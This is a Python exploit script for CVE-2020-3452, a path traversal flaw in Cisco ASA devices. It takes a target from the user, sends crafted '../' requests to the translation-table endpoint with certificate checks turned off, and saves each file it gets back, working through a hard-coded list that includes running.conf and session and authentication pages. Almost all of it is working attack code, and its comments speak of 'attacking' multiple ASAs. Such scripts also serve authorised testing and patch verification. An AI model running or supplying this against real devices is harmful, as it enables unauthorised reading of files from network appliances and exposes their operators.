CVE-2020-3452.py - Cisco ASA Path Traversal

1. import os
2. import requests
3.  
4. # Written by freakyclown for @CygentaHQ
5. # Cisco ASA Path Traversal
6. # CVE-2020-3452
7. # Usage: CVE-2020-3452.py {target}"
8. # Example: CVE-2020-3452.py 192.168.0.12"
9. # Requires - Requests - pip3 install requests
10. #
11. # This tool takes advantage of the above cve and attempts to
12. # download files as listed below, it is suggested that you make
13. # a working folder for the outputfiles to avoid confusion if
14. # attacking mutliple ASA's
15.  
16. # set your target
17. target = input("Enter target IP/Url: ")
18.  
19.  
20. def grabstuff():
21.     for file in files:
22.         print("trying: ", file)
23.  
24.         #set request parameters
25.         params = (
26.             ('type', 'mst'),
27.             ('textdomain', file),
28.             ('default-language', ''),
29.             ('lang', '../'),
30.         )
31.  
32.         # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
33.         response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
34.         # write the file to the disk
35.         directory = os.path.dirname(file)
36.         if not os.path.exists(directory):
37.             os.makedirs(directory)
38.         f = open(file,"w")
39.         f.write(response.text)
40.         f.close()
41.  
42.  
43.  
44. # this is a list of files available to download, more will be added in time
45. # if anyone has a list of ASA files, I'd be happy to add here
46. files = {
47. "+CSCOCA+/ca_inc.lua",
48. "+CSCOCA+/crl/asa_ca.crl",
49. "+CSCOCA+/enroll.html",
50. "+CSCOCA+/login.html",
51. "+CSCOE+/041235123432C2",
52. "+CSCOE+/041235123432U2",
53. "+CSCOE+/app_index.html",
54. "+CSCOE+/appstart.js",
55. "+CSCOE+/appstatus",
56. "+CSCOE+/ask.html",
57. "+CSCOE+/auth.html",
58. "+CSCOE+/autosignon_api.js",
59. "+CSCOE+/blank.html",
60. "+CSCOE+/cedf.html",
61. "+CSCOE+/cedhelp.html",
62. "+CSCOE+/ced.html",
63. "+CSCOE+/cedlogon.html",
64. "+CSCOE+/cedmain.html",
65. "+CSCOE+/cedportal.html",
66. "+CSCOE+/cedsave.html",
67. "+CSCOE+/cert.html",
68. "+CSCOE+/color_picker.html",
69. "+CSCOE+/color_picker.js",
70. "+CSCOE+/common.js",
71. "+CSCOE+/commonspawn.js",
72. "+CSCOE+/display_bookmarks.lua",
73. "+CSCOE+/files/browse.html",
74. "+CSCOE+/files/domains_retr",
75. "+CSCOE+/files/file_action.html",
76. "+CSCOE+/files/files.js",
77. "+CSCOE+/files/files_retr",
78. "+CSCOE+/files/webfolder",
79. "+CSCOE+/files/wfolder",
80. "+CSCOE+/gp-gip.html",
81. "+CSCOE+/handler",
82. "+CSCOE+/help/webvpn_help",
83. "+CSCOE+/home/index.html",
84. "+CSCOE+/http_auth.html",
85. "+CSCOE+/include/browser_inc.lua",
86. "+CSCOE+/include/common.lua",
87. "+CSCOE+/include/plugin.lua",
88. "+CSCOE+/lced.html",
89. "+CSCOE+/load_bookmarks.lua",
90. "+CSCOE+/localization_inc.lua",
91. "+CSCOE+/logo.gif",
92. "+CSCOE+/logon_custom.css",
93. "+CSCOE+/logon_forms.js",
94. "+CSCOE+/logon.html"
95. "+CSCOE+/logon.html",
96. "+CSCOE+/logon_redirect.html",
97. "+CSCOE+/logout.html",
98. "+CSCOE+/message.html",
99. "+CSCOE+/noportal.html",
100. "+CSCOE+/nostcaccess.html",
101. "+CSCOE+/no_svc.html",
102. "+CSCOE+/ping.html",
103. "+CSCOE+/pluginlib.js",
104. "+CSCOE+/portal_ce.html",
105. "+CSCOE+/portal.css",
106. "+CSCOE+/portal_custom.css",
107. "+CSCOE+/portal_elements.html",
108. "+CSCOE+/portal_forms.js",
109. "+CSCOE+/portal.html",
110. "+CSCOE+/portal_inc.lua",
111. "+CSCOE+/portal.js",
112. "+CSCOE+/posturl.html",
113. "+CSCOE+/preview.html",
114. "+CSCOE+/relayjar.html",
115. "+CSCOE+/relaymonjar.html",
116. "+CSCOE+/relaymonocx.html",
117. "+CSCOE+/relayocx.html",
118. "+CSCOE+/running.conf",
119. "+CSCOE+/saml/sp/acs",
120. "+CSCOE+/saml/sp/login",
121. "+CSCOE+/saml/sp/metadata",
122. "+CSCOE+/save_capture.html",
123. "+CSCOE+/sdesktop/fail.html",
124. "+CSCOE+/sdesktop/logout.html",
125. "+CSCOE+/sdesktop/scan.xml",
126. "+CSCOE+/sdesktop/tokenrenew.xml",
127. "+CSCOE+/sdesktop/token.xml",
128. "+CSCOE+/sdesktop/wait.html",
129. "+CSCOE+/sdesktop/webstart.xml",
130. "+CSCOE+/session.js",
131. "+CSCOE+/session_password.html",
132. "+CSCOE+/sess_update.html",
133. "+CSCOE+/shshim",
134. "+CSCOE+/shshimdo_url",
135. "+CSCOE+/smart_tunnel_install.html",
136. "+CSCOE+/st_dl.json",
137. "+CSCOE+/svc.html",
138. "+CSCOE+/tlbr",
139. "+CSCOE+/tlbrportal_forms.js",
140. "+CSCOE+/tunnel_linux.jnlp",
141. "+CSCOE+/tunnel_mac.html",
142. "+CSCOE+/tunnel_mac.jnlp",
143. "+CSCOE+/useralert.html",
144. "+CSCOE+/user_dialog.html",
145. "+CSCOE+/win.js",
146. "+CSCOE+/wrong_url.html",
147. "+CSCOL+/cte_fallback.js",
148. "+CSCOL+/cte.js",
149. "+CSCOL+/relayparam.js",
150. "+CSCOL+/sw.js",
151. "+CSCOL+/xsl.js",
152. "CSCOSSLC/config-auth",
153. "+CSCOT+/oem-customization",
154. "+CSCOT+/translation",
155. "+CSCOT+/translation-table",
156. "+CSCOU+/anyconnect_unsupported_version.html",
157. "+CSCOU+/anyconnect_wrong_url.html",
158. "+CSCOU+/portal.css",
159. "+CSCOU+/sample.html",
160. "locale/manifest_data.lua"
161. }
162.  
163.  
164. # Trying....
165. try:
166.     grabstuff()
167. except Exception as err:
168.     print("Something went wrong, sorry")
169.     print(err)
170.  
171.